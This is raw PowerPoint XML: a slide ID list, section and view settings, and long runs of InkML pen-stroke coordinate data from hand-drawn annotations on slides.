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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="567" r:id="rId2"/>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="568" r:id="rId6"/>
    <p:sldId id="569" r:id="rId7"/>
    <p:sldId id="570" r:id="rId8"/>
    <p:sldId id="571" r:id="rId9"/>
    <p:sldId id="572" r:id="rId10"/>
    <p:sldId id="573" r:id="rId11"/>
    <p:sldId id="574" r:id="rId12"/>
    <p:sldId id="575" r:id="rId13"/>
    <p:sldId id="576" r:id="rId14"/>
    <p:sldId id="577" r:id="rId15"/>
    <p:sldId id="578" r:id="rId16"/>
    <p:sldId id="579" r:id="rId17"/>
    <p:sldId id="580" r:id="rId18"/>
    <p:sldId id="581" r:id="rId19"/>
    <p:sldId id="582" r:id="rId20"/>
    <p:sldId id="583" r:id="rId21"/>
    <p:sldId id="584" r:id="rId22"/>
    <p:sldId id="585" r:id="rId23"/>
    <p:sldId id="586" r:id="rId24"/>
    <p:sldId id="587" r:id="rId25"/>
    <p:sldId id="588" r:id="rId26"/>
    <p:sldId id="589" r:id="rId27"/>
    <p:sldId id="590" r:id="rId28"/>
    <p:sldId id="591" r:id="rId29"/>
    <p:sldId id="592" r:id="rId30"/>
    <p:sldId id="593" r:id="rId31"/>
    <p:sldId id="594" r:id="rId32"/>
    <p:sldId id="595" r:id="rId33"/>
    <p:sldId id="596" r:id="rId34"/>
    <p:sldId id="600" r:id="rId35"/>
    <p:sldId id="597" r:id="rId36"/>
    <p:sldId id="598" r:id="rId37"/>
    <p:sldId id="599" r:id="rId38"/>
    <p:sldId id="601" r:id="rId39"/>
    <p:sldId id="602" r:id="rId40"/>
    <p:sldId id="603" r:id="rId41"/>
    <p:sldId id="604" r:id="rId42"/>
    <p:sldId id="605" r:id="rId43"/>
    <p:sldId id="606" r:id="rId44"/>
    <p:sldId id="607" r:id="rId45"/>
    <p:sldId id="608" r:id="rId46"/>
    <p:sldId id="609" r:id="rId47"/>
    <p:sldId id="610" r:id="rId48"/>
    <p:sldId id="611" r:id="rId49"/>
    <p:sldId id="612" r:id="rId50"/>
    <p:sldId id="613" r:id="rId51"/>
    <p:sldId id="614" r:id="rId52"/>
    <p:sldId id="615" r:id="rId53"/>
    <p:sldId id="616" r:id="rId54"/>
    <p:sldId id="617" r:id="rId55"/>
    <p:sldId id="618" r:id="rId56"/>
    <p:sldId id="619" r:id="rId57"/>
    <p:sldId id="620" r:id="rId58"/>
    <p:sldId id="621" r:id="rId59"/>
    <p:sldId id="622" r:id="rId60"/>
    <p:sldId id="623" r:id="rId61"/>
    <p:sldId id="624" r:id="rId62"/>
    <p:sldId id="625" r:id="rId63"/>
    <p:sldId id="626" r:id="rId64"/>
    <p:sldId id="627" r:id="rId65"/>
    <p:sldId id="628" r:id="rId66"/>
    <p:sldId id="629" r:id="rId67"/>
    <p:sldId id="630" r:id="rId68"/>
    <p:sldId id="631" r:id="rId69"/>
    <p:sldId id="632" r:id="rId70"/>
    <p:sldId id="633" r:id="rId71"/>
    <p:sldId id="634" r:id="rId72"/>
    <p:sldId id="635" r:id="rId73"/>
    <p:sldId id="636" r:id="rId74"/>
    <p:sldId id="637" r:id="rId75"/>
    <p:sldId id="638" r:id="rId76"/>
    <p:sldId id="639" r:id="rId77"/>
    <p:sldId id="651" r:id="rId78"/>
    <p:sldId id="650" r:id="rId79"/>
    <p:sldId id="640" r:id="rId80"/>
    <p:sldId id="641" r:id="rId81"/>
    <p:sldId id="642" r:id="rId82"/>
    <p:sldId id="643" r:id="rId83"/>
    <p:sldId id="644" r:id="rId84"/>
    <p:sldId id="645" r:id="rId85"/>
    <p:sldId id="646" r:id="rId86"/>
    <p:sldId id="647" r:id="rId87"/>
    <p:sldId id="648" r:id="rId88"/>
    <p:sldId id="649" r:id="rId89"/>
    <p:sldId id="652" r:id="rId90"/>
    <p:sldId id="653" r:id="rId91"/>
    <p:sldId id="654" r:id="rId92"/>
    <p:sldId id="655" r:id="rId93"/>
    <p:sldId id="656" r:id="rId94"/>
    <p:sldId id="657" r:id="rId95"/>
    <p:sldId id="658" r:id="rId96"/>
    <p:sldId id="659" r:id="rId97"/>
    <p:sldId id="660" r:id="rId98"/>
    <p:sldId id="661" r:id="rId99"/>
    <p:sldId id="662" r:id="rId100"/>
    <p:sldId id="663" r:id="rId101"/>
    <p:sldId id="664" r:id="rId102"/>
    <p:sldId id="665" r:id="rId103"/>
    <p:sldId id="666" r:id="rId104"/>
    <p:sldId id="667" r:id="rId105"/>
    <p:sldId id="668" r:id="rId106"/>
    <p:sldId id="669" r:id="rId107"/>
    <p:sldId id="670" r:id="rId108"/>
    <p:sldId id="671" r:id="rId109"/>
    <p:sldId id="672" r:id="rId110"/>
    <p:sldId id="673" r:id="rId111"/>
    <p:sldId id="674" r:id="rId112"/>
    <p:sldId id="675" r:id="rId113"/>
    <p:sldId id="676" r:id="rId114"/>
    <p:sldId id="677" r:id="rId115"/>
    <p:sldId id="678" r:id="rId116"/>
    <p:sldId id="679" r:id="rId117"/>
    <p:sldId id="680" r:id="rId118"/>
    <p:sldId id="681" r:id="rId119"/>
    <p:sldId id="682" r:id="rId120"/>
    <p:sldId id="683" r:id="rId121"/>
    <p:sldId id="684" r:id="rId122"/>
    <p:sldId id="685" r:id="rId123"/>
    <p:sldId id="686" r:id="rId124"/>
    <p:sldId id="687" r:id="rId125"/>
    <p:sldId id="688" r:id="rId126"/>
    <p:sldId id="689" r:id="rId127"/>
    <p:sldId id="690" r:id="rId128"/>
    <p:sldId id="691" r:id="rId129"/>
    <p:sldId id="693" r:id="rId130"/>
    <p:sldId id="692" r:id="rId131"/>
    <p:sldId id="694" r:id="rId132"/>
    <p:sldId id="695" r:id="rId133"/>
    <p:sldId id="696" r:id="rId134"/>
    <p:sldId id="697" r:id="rId135"/>
    <p:sldId id="698" r:id="rId136"/>
    <p:sldId id="699" r:id="rId137"/>
    <p:sldId id="700" r:id="rId138"/>
    <p:sldId id="701" r:id="rId139"/>
    <p:sldId id="702" r:id="rId140"/>
    <p:sldId id="703" r:id="rId141"/>
    <p:sldId id="704" r:id="rId142"/>
    <p:sldId id="705" r:id="rId143"/>
    <p:sldId id="706" r:id="rId144"/>
    <p:sldId id="707" r:id="rId145"/>
    <p:sldId id="708" r:id="rId146"/>
    <p:sldId id="709" r:id="rId147"/>
    <p:sldId id="710" r:id="rId148"/>
    <p:sldId id="711" r:id="rId149"/>
    <p:sldId id="712" r:id="rId150"/>
    <p:sldId id="713" r:id="rId151"/>
    <p:sldId id="714" r:id="rId152"/>
    <p:sldId id="715" r:id="rId153"/>
    <p:sldId id="716" r:id="rId154"/>
    <p:sldId id="717" r:id="rId155"/>
    <p:sldId id="718" r:id="rId156"/>
    <p:sldId id="719" r:id="rId157"/>
    <p:sldId id="720" r:id="rId158"/>
    <p:sldId id="721" r:id="rId159"/>
    <p:sldId id="722" r:id="rId160"/>
    <p:sldId id="723" r:id="rId161"/>
    <p:sldId id="724" r:id="rId162"/>
    <p:sldId id="725" r:id="rId163"/>
    <p:sldId id="726" r:id="rId164"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="9144000" cy="5143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106A11F7-297F-4F41-A9DE-51DB3C6DDD1C}">
          <p14:sldIdLst>
            <p14:sldId id="567"/>
            <p14:sldId id="259"/>
            <p14:sldId id="258"/>
            <p14:sldId id="260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600"/>
            <p14:sldId id="597"/>
            <p14:sldId id="598"/>
            <p14:sldId id="599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51"/>
            <p14:sldId id="650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3"/>
            <p14:sldId id="692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</p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{60CD21C1-E6C4-4A45-8333-4B7FA08E6D9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904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03" d="100"/>
          <a:sy n="103" d="100"/>
        </p:scale>
        <p:origin x="878" y="77"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2904"/>
        <p:guide pos="21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5-02T12:26:20.4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14407 8374 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="510.29">14407 7832 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="5758.31">16312 9247 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="108306.42">13798 10054 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="161820.56">14076 11007 0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5-02T12:30:59.31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1442 9049 0,'0'13'31,"0"0"1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="188494.75">7038 5345 0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5-02T12:46:58.6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13084 3823 0,'0'0'0,"-27"13"0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8:48:53.5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7633 1971 0,'-13'13'16,"26"-26"-16,-52 53 15,25-14 1,-12 1 0,-40 12-1,-252 54 16,252-67-31,-106 27 16,79-39 0,41-1-1,25-13 1,1 0 0,-54 0-1,54 0-15,-54 0 16,67 0-16,-93 0 15,-66-40 1,-53-26 0,27 53-1,26 13 1,13-13 0,106 13-16,-39 0 15,-27 0 1,53 0-1,13 0 17,0 0-17,26 0 1,1-14 0,26 1-1,-40 0 1,0 0-1,-39-14 1,13 1 0,39 13-16,-25-14 15,-41-52 1,67 26 0,-14 0-1,-13 0 1,13 13 15,27 14-15,0 13-1,-27 13 48,-53-27-48,14 27 1,-40-13 0,26-14-1,1 27 1,26-13 0,39-13-1,-12 26 1,12-14 15,-13 1-15,1-13-1,39 13-15,-40-1 16,14 1 0,26 0-1,-14-14 1,14 1-1,0 13 1,0-14-16,-26-26 16,13 14-1,-14-14 1,27 40 46,0-1-46,0-25 0,0 12-1,0 14 1,0-27 0,27 14-1,12-14 1,-12 14-16,-1 12 0,40-12 15,40-27 1,-53 27 0,27 12-1,-1-12 1,-53 26-16,41-13 16,-28 13-16,80-14 15,119-12 16,-92 26-15,13 0 0,-14 0-1,-26 0 1,-79 0-16,0 0 16,145 0-1,26 0 1,81 26-1,12 14 1,-66-13 0,-185-27-16,66 26 15,26-26 1,-39 0 15,-13 0-15,-1 0-1,-25 0 1,-41 0-16,14 13 16,-1-13-1,-25 0 1,-1 0 0,13 0 30,93 40-30,-105-40-16,52 26 16,26 1-1,14 26 1,-26 13 0,-80-53-16,13-13 15,0 40 1,-13-14-16,53 133 31,-53 66-15,0-66-1,0-67 1,0-52-16,0 53 16,13-27-1,-13-13 1,0-27-1,0 1 1,0-1 0,0 0-1,-13 14 1,0-13 0,-14 12-1,1 14 1,13-13 15,-1-40-31,14 13 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-9501.34">19513 3096 0,'13'13'31,"0"27"-15,14-1-16,52 265 16,40 93-1,27 13 1,-40-92 0,-80-252-16,27 159 15,0 106 1,-27-239-16,1 146 15,66 27 1,-54-40 0,-12-106-1,-27-79-15,0 13 16,0 39 0,0-52-16,-27 132 15,-12 40 1,12 65-1,-13-52 17,40-172-32,-13-13 0,13 39 15,0-26-15,0-26 0,0 78 16,-40 200 0,27-27-1,13-1 1,0-78-1,0-27 1,0-133-16,0 67 16,0 40-1,0-14 1,0 27 0,0-27-1,13-26 1,-13-80-1,14-12-15,-1 25 16,0-25-16,-13-1 0,27 40 16,-14 0-1,0 39 1,14-26 0,-14 40-1,0-79-15,-13 26 16,13 52-1,-13-25 1,0 12 0,0 120-1,-26-53 1,13-146-16,-1 93 16,-12 26-1,26-119 1,0 27-16,0 0 31,-13-1-15,13-25-16,0 39 15,0 13 1,0-13 0,0-14-1,0-25-15,0 12 16,0 1-1,0-14 1,0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8:49:07.2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15068 5146 0,'-13'0'0,"26"0"0,-39-13 15,-27 0 17,13-1-17,27 14-15,-40-13 16,-278-26 0,93-28-1,-27 14 1,67 53-1,-1 0 1,-25 0 0,-94 0-1,-26 0 1,13 0 0,278 0-16,-39 27 15,13-27 1,-1 0 15,-65 0-15,-41 13-1,54-13 1,13 0 0,-13 0-1,52 0 1,-12 0-1,52 0 1,0 0 0,1 0-1,12 0 1,1 0 0,-67 0-1,14 0 1,-67 0 15,-145-53-15,252 40-16,-133 0 15,39-27 1,80 27 0,27 13-1,-1 0 1,1-13-1,13 13-15,-14-14 16,-12 14 0,-28-13-1,15 0 1,25 13 0,14 0-16,-40 0 62,13 0-46,-39 0-1,13 0 1,53-13-16,13-1 16,0-65 46,0-13-46,0 65-16,0 1 15,0-14-15,0 13 0,0-65 16,0 39 0,26 13-1,27-13 1,-40 40-1,14-40-15,-1 40 16,14-27 0,92 1-1,-119 39-15,106-27 16,212 27 0,-159-13-1,66 0 1,-185 13-16,146-14 15,12 14 1,-12 0 0,171 0 15,-344 0-31,41 0 16,-41 0-16,40 0 15,14 0 16,78 0 1,-78 0-17,-41 0-15,120 0 16,-79 0-16,52 0 16,-53-13-1,14-13 1,26 13-1,0 13 1,0 0 0,-79-14-16,79 1 15,13-27 1,66 14 0,14 26-1,0 0 1,-80 0 15,-105-13-31,-1 13 16,27 0-1,26 0 1,54 0 0,184 0-1,-304 0-15,67 26 16,-14 1-1,-53-14 1,-13 53 62,0 27-62,0-67-16,13 67 15,-13-80 17,0 27-17,0 26 1,-26-40 0,26 27-1,0-40 1,0 1-1,0 12 1,-40 67 15,27-67-31,0-13 16,-1 53 0,-12 67 15,13-94-16,-27 67 17,40-93-17,-13-13 1,0 14 0,-1 25-1,1-25 1,0 12-1,-13 1 17,-14-1-17,13 14 1,-12-1 15,25-39-31,1 0 78,13 14-46,-26-1 108,13-13-124,13 13 15,-14-13-31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8:52:38.4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16285 7091 0,'0'-13'31,"-26"-27"-15,-107 40 0,-39 0-1,40 0 17,-40 13-17,119-13-15,-106 13 16,-224-13-1,65 0 1,-79 0 0,53 0-1,120 0 1,197 0-16,-92-26 16,13-14-1,80 40 1,-1 0-1,-26 0 1,-26 0 0,13 0-1,13-13 17,40 0-17,13 0 32,0-14-31,0-13-1,0-13 1,0 14 0,0-14-1,0 40-15,0-40 16,0-53-1,0 27 1,0 26 0,0 26-1,0 1 1,0-1 0,0 14-1,0-13 1,0 12 31,53-12-32,-14 13-15,27-54 16,54 1 0,171-26-1,-212 65 1,-39 14-1,65 13 1,41 0 0,66 0-1,-186 0 1,14 0-16,13 0 16,66 0-1,-80 0 1,1-13-1,13-14 1,26 27 0,-52 0-16,92 0 15,132-26 1,-224 26-16,12-13 16,-12 13-1,-1 0 16,27 0-15,40 0 0,-14 0-1,-39 0 1,66 0-16,-27 26 31,-13 1-15,27 39-1,26 26 1,212 199 0,-173-132-1,-52-27 1,13 1 0,-66-41-1,-39-26 1,-1-66-1,-13 14 95,-13-1-95,-1 13 1,1-12 0,13-1-16,-26 0 15,-41-13 1,1 27 0,-53-27-1,-132 39 1,132-26-1,106-13 79,-1-13-16,1 0 63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8:53:17.7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5609 8202 0,'-13'0'62,"-66"0"-46,-27 0 15,-40-13-15,80 13-16,-225-27 15,66 27 1,172 0-16,-92 0 16,105 0-16,-79 0 15,-53 0 1,119 0-16,-106 14 16,80-1-16,-67 13 15,67-12-15,-146 52 16,0 0-1,53-26 1,0-14 0,106-13-1,-26-13 1,65 0 0,-66 0-16,-12 0 31,38 13-16,1-13 1,40 0 0,-14 0-1,14 0-15,-40 0 16,-1 0 0,15 0-1,-15 0 1,54 0-16,-27-13 15,27-13 126,13-54-125,0-25-1,-39-15 1,12 41 0,-39-27-1,53 40-15,-27-212 16,27 159-1,0 66 1,13-13 0,0 53-1,0-40 1,0 40-16,13-67 31,53 1-15,40-14-1,13 1 1,-93 65-16,54-39 16,52 0-1,-106 40-15,107-54 16,-1 27 0,14 14-1,12 25 1,41 14-1,92 0 1,-13 0 0,-40 0-1,-40 0 1,27 27 15,-53-1-15,13 14-1,40 0 1,26 13 0,-79-27-1,-39-13 1,-107 1 0,-13-14 15,40 39-16,-39-12-15,38 12 16,28 28 0,-27-54-1,-40 13 1,0-26-16,0 27 31,14-27-15,-1 39-1,1 28 1,-27 224 0,-13 132-1,-1-304-15,1 238 16,0-132 0,0-106-1,-14-79 1,14-14-1,-27-13 1,1 1 0,12-14-1,1 0 1,-27 13 15,26-13-15,14 0-1,0 0 17,0 0 77</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1006.11">9141 8334 0,'0'0'0,"-39"27"31,171-27 32,133 0-48,-173 0-15,371 0 16,-79 0 0,-159 0-1,-133 0 1,-65 0-16,-14 0 31,40 0-15,13 0-1,27 0 1,-1-13 0,-12 13 15,-67-14-16,0 14 1,0-13 0,40 0-1,-40 13 1,1 0 0,-14-13 30,13 13-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1890.52">15187 8083 0,'278'66'15,"-556"-132"-15,1019 225 32,-675-159-32,93 13 0,211-13 31,-224-53-15,-40 13-1,-93 40-15,53-26 16,-26 26-1,-1 0 79,-12 0-78,26 0-1,26-13 1,-66 13-16,80-14 16,0 1-1,-27 0 17,-53 13-17,212 0 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4456.2">23204 7937 0,'-146'0'78,"-568"-145"-63,198 132 1,357 39 0,14 27-1,-40-13 1,26-40-1,53 0 1,80 13 0,26 0-1,-14-13-15,14 13 16,-13-13-16,-13 14 31,-14-14-15,14 0-1,-1 0 48,-79 39-47,-13-25-1,106-1 1,0-13 46,-106 0-46,79-13 15,27 13-15,-14 0-16,-12 0 15,12-14 1,14 14 47,-40-26-48,-13-14 1,39 1-1,14 39 48,-13-80-47,-27-52-1,26 13 1,27 92-16,-13-26 15,13 14 1,0-27 0,0-1-1,0 41-15,0-40 16,40 26 0,-14 14-1,80-40 1,-40 26-1,67-79 1,-107 119 0,27-40-16,-13 27 15,26 13 17,66 0-1,-106 0-31,80-13 15,-40 13-15,133-14 16,13 14 0,-93 0-1,-53 0 1,-13-13 0,26 13-1,-52 0-15,52 0 16,66 0-1,160 0 1,-133 13 0,-67 27-1,1-13 17,-79-14-32,52 13 15,1 14 1,-28-27-1,15 14 1,-54-14-16,0-13 16,40 0-1,-13 13 1,26 0 0,26-13-1,-52 14 1,-27-14-1,14 0 1,-14 0-16,66 66 31,120 119-15,-133-106 15,-53-39-15,0-14-16,-13 14 15,14 40 1,-14-28 0,0-12-1,0 0 1,0 13 0,0-27-16,-40 40 15,27-39 1,0-1-1,-1 1 1,1-14 0,-27 0-1,-13 14 17,27-27-17,0 0 1,-1 0 15,1 0-15,12 0-1,-12 0 1,-1 0 0,1 0-1,0 0 1,-14 0-1,13-14 1,14 14 15,0 0 47,-14 0-62,1 0 0,13 0 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="195437.17">17132 8070 0,'-27'0'46,"-118"0"-30,92 0-16,-132 53 16,-53 26-1,158-52-15,-171 12 16,66 1 0,13-27-1,13-13 1,119 0-1,-79 0-15,-66 0 32,132 0-32,-79 0 15,13 0 1,92 0-16,-13 0 16,1 0-1,12 13-15,-12 1 16,12-14-16,-12 0 15,-41 0 1,40 0 0,14 0-1,26-14 48,-26-78-48,-41-1 17,-12-13-17,26 40 1,0-26 0,40 78-16,-14-91 15,14-1 1,13 0-1,0 53 1,0 40-16,13-27 94,54-26-79,-41 39-15,1 1 16,184-80 0,-118 80-16,118-27 15,81-27 1,-173 41 0,79-1-1,-66 14 1,93-14-1,-132 40-15,304 0 16,0 0 0,-120 0-1,-197 0 1,-67 0-16,27 0 16,-14 0-1,-13 0-15,106 0 16,67 13-1,-67 40 17,-27-13-17,-52-14 1,39 14 0,-65-27-16,52 27 15,13-1 1,-66-12-1,27 26 1,-27-14 0,1 28-1,-14-41-15,13 40 16,-13 40 0,0 53-1,-40-67 1,14-12-1,-1-54 17,14-13-32,-27 27 15,-66 26 1,-39 0 0,-27 14-1,13-54 1,14 14-1,118-27-15,-52 0 16,26-13 0,26 0-1,-26 0 1,14 0 0,-1 0-1,27 0-15,-14 0 16,14 0-1,0 0 79</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="201386.55">4194 7779 0,'26'13'63,"14"-13"-32,198 0-16,-26 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="202256.44">9446 8176 0,'-14'-14'78,"28"-12"-63,12 13-15,106-53 16,384-106 0,-410 119-16,79-13 15,186-54 1,-292 94-1,-66 26 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="204626.08">15981 7633 0,'-13'0'16,"-40"0"15,-80 13-16,-25 54 1,-14-14 0,132-40-16,-92 26 15,66-25 1,52-14-16,14 13 16,146-13 93,185 0-93,-279 0-16,134 0 15,-54 0 1,-106 0-16,27 0 15,-26 0 1,-14 0 0,13 0-1,14 0 1,0 0 0,-14-27-1,-12 27 1,12 0-1,-13 0 17,0 0-17,1-26 1,52 26 0,53-26-1,-40 26 1,27 0-1,-26 0 1,-41 0 0,-158 0 93,-185 39-93,119-26-1,-199 54 1,14-15 0,39-12-1,119-40 1,14 0-1,185 0-15,-40 0 16,-14 13 0,41-13-1,0 0 1,-1 14 0,1-14-1,12 13 1,1-13-1,-13 13 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="207553.8">22754 8176 0,'-172'0'63,"106"0"-48,0 0-15,-159 0 16,-106 0 0,-105 0-1,370 0-15,-93 0 16,40 0-1,53 0 1,-27 0 0,67 0-1,-54 0 1,27 0 0,14 0-1,25 0 1,1 0 15,0 0 0,0 0-31,-14 0 16,-13 0 0,1 0-1,-1 0 1,27 0-16,0 0 15,-27 0 1,27 0 0,171 0 109,1 0-110,106 0 1,-80 0 0,-119 0-16,159 26 15,106 14 1,-93-1-1,-40-12 1,27 13 0,27-40-1,-133 0 1,-40 0 0,-52 0-1,-14 0 1,0 0 46,-92 0 63,-517 0-109,146 0 0,133 0-1,251 0-15,-80 0 16,-39 0-1,145 0 17,1 0-17,12 0 1,1 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-172928.7">12621 4260 0,'-14'0'32,"14"13"-17,0 13-15,14 27 16,-1 40 0,27-14-1,-14 27 1,0-13-1,1-14 1,-27-66 0,13 27-1,14 13 1,-14 0 0,0-53-1,0 13 1,93-145 46,26-119-46,-39 131 0,-40 68-1,-40 52 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-139543.68">5226 6906 0,'-27'0'47,"1"0"-31,12 0-16,-65 0 15,-27 0 1,93 0-16,-305 0 15,54 0 1,132 0 0,26 0-1,93 0-15,-54 0 16,-52 0 0,80 0-16,-94 26 15,1-13 1,-14 14-1,-12-27 17,-27 0-1,92 0-15,40 0-1,0 0 1,13 0-1,1 0 1,12 0-16,-26 0 16,40 13-16,-93 13 15,-39-26 1,92 27 0,13-14-1,0 0 1,1 27-1,12-13-15,-26 12 16,-26 41 0,13-28 15,39 28-15,-12-14-1,26 0 1,-1-53-16,14 27 15,0 0 1,0-14 0,0 14-1,0-14-15,14 54 16,25 39 0,-26-106-16,27 80 15,-13-40 1,-1-1-1,14-12 1,26 0 15,13 0-15,-66-27-16,14 0 0,52 27 16,1 13-1,26-14 1,79 41-1,13-41 1,-145-39-16,132 27 16,27-14-1,-159-13-15,159 0 16,26 0 0,39-26-1,-52-1 1,-172 27-16,159-40 31,92-26 0,-158 27-15,-40-1 0,-40 0-1,0 27 1,-26 0-1,-1-14 1,14 1 0,-26 13-1,-1 13 1,1-14 0,-1-12-1,0 13 1,27-40-1,27-27 1,-14-12 0,-40 12 15,-12 67-31,-14 0 0,13-13 16,13-54-1,-13-26 1,-13 53-1,0 14 1,0-14 0,0 40-16,0-27 15,0-40 1,-13 28 0,-13 12-1,13 13 1,-27 1-1,13 26-15,-52-13 16,-146-27 0,80-13 15,-14 0-15,13 0-1,67 0 1,66 53-16,0-13 15,13 0 1,-14 13 47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-131922.84">11311 8255 0,'-27'-13'62,"-12"13"-46,-14 0-16,-132 0 16,-133-13-1,14-54 1,0 54-1,145 13 1,13 0 0,120 0-16,-80 0 15,-26 0 1,66 0 0,-1 0-1,54 0-15,-13 0 16,-40 0-1,13 0 1,-13 0 0,26 0 15,-53-40-15,1 40-1,-14-13 1,26 13-1,1-13 1,66 13-16,0 0 16,-14-26-1,1-1 1,-14-13 0,-13-13-1,-13-13 1,53 53-1,-27-66 1,27 52-16,-27-26 16,14-13-1,12 13 17,1 27-17,13-1 1,0-12-1,0 25-15,0-52 16,13 27 0,14 12-1,-14-13 1,14 27 0,12-40-1,14 14 1,-13-27-1,26-1 1,0 28 0,0 12-1,53 14 17,67 0-17,-41 13 1,-26 0-1,-79 0 1,0 0 0,65 13-1,1 13 1,-26 1 0,-27-27-1,52 0 1,-65 0-16,132 0 15,-132 13 1,79 14-16,92 65 16,-52-12 15,-40-54-15,-13 27-1,-27-53 1,-65 0-16,25 0 15,1 0 1,-27 0 0,14 0-1,-1 0 1,27 0 0,53 13-1,13 27 1,-26-27-1,-27-13 1,-53 0 0,13 0-16,-12 0 15,12 0 1,27 0 0,-13 0-1,-14 0 1,1 0-1,12 0 17,-25 0-17,-1 0 1,-13 13 93,0 67-93,0-67 0,0 40-1,0-40-15,0 14 16,-13-1-1,-14-13 1,14 0 0,-27 14-1,1-1 1,-28 14 0,14-13-1,1-27 1,-1 0-1,-40 13 1,-13-13 15,93 0-31,-133 26 32,120-26-17,13 0 1,-14 0-1,14 0-15,-13 13 16,-27 14 0,0 13-1,13-40 1,14 0 0,-1 13-1,1-13 1,-1 0-16,27 13 15,-13-13-15,-27 26 16,27-12-16,-40 12 16,-13 1 15,26-1-15,1-13-1,12 1 188,14-14-187,-13 13 15,12 0-15,1 0-1,0 14 1,0-27-16,-1 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-128818.89">9512 5741 0,'-93'0'63,"-145"0"-48,-27 0 1,27 0-1,53 0 1,132 0 0,40 0-16,0 0 15,-27 0 1,14 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-128274">8493 5741 0,'0'0'0,"13"0"15,14 0 1,-14 0 0,0 0-16,27 0 15,0 53 1,-1 27 0,-25 12-1,12-39 1,-13 0-1,0-40 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-127526.72">9644 6152 0,'0'-14'16,"-53"1"-1,13 13-15,-79 0 16,0 0 15,80 13-31,12 27 32,27-27-1,0 0-16,0 1-15,0 39 16,0-14 0,13-25-1,27-14 32,119 0-31,92 0-1,-198-14 1,-40 1 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-126938.85">9803 5993 0,'0'13'79,"0"133"-64,0-107-15,0 1 0,0 13 16,26 172-1,1-119 17,-1-54-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-125915.21">9842 6138 0,'0'-26'62,"27"-54"-30,-1 54-32,27 0 0,106-1 15,-27 27 1,-92 0-1,-27 0 1,1 0 31,-1 66-31,-13-53-16,13 14 15,-13 39 1,-40 0-1,14-66-15,-14 27 16,-52 26 0,12-40-1,40 0 17,27-13-17,-13 27 1,-1-27-1,-65 0 1,78 0 0,1 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-114963.72">20651 6310 0,'0'14'16,"0"-28"-16,-53 67 16,53-40-1,-13-13 32,13-105-31,0-54-1,13-13 17,40 53-17,-40 39 1,0 41-1,14-41 1,-27 41 0,39-14-1,-12 13 1,-14 14 0,-13 12-16,13-12 15,0 13 1,27 79 46,79 225-46,-106-238-16,27 39 16,-13 27-1,12 14 1,1-80-1,-40-40 1,26-92 109,14-133-109,-27 159-16,40-212 15,-40 133 17,14 39-17,-14 54 1,0 26 15,-13 79 16,40 79-31,-40-118-16,0 105 15,0-92 1,27 52-16,-14 107 31,26-1-15,-39-145-1,0-26 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-114180.52">21762 6390 0,'40'-119'78,"13"-40"-62,-40 119-16,13-79 15,1-40 1,-27 120-1,13-41-15,0-12 16,27-1 0,-27-13 15,27 14-15,-14 52-1,-26 0 1,13 40-1,1 0 64,25 238-64,41 27 1,-14 0-1,-66-213-15,26 120 16,14 0 0,-40-119-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-113224.65">21907 5913 0,'120'14'141,"104"39"-125,-171-27-1,-26-13 1,-14-13 156</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-112318.14">23310 5847 0,'-13'-13'0,"26"26"0,-66-52 16,26 39-16,14-14 15,-13 14-15,-40 0 16,39 0 0,1 0-16,-40 0 0,-67 53 31,120-39-31,-13-14 0,-14 39 16,-26 1-1,52-14 1,14-12-16,0-1 15,0 53 1,0-26 0,0-14-1,0-13 1,14 14 0,12-14-16,40 27 15,53-14 1,93 27-1,-80-13 1,-52-27 0,-27 0-1,-27-13 17,14 0-17,-1-13 1,1 13-1,-27 0 1,1 0 0</inkml:trace>
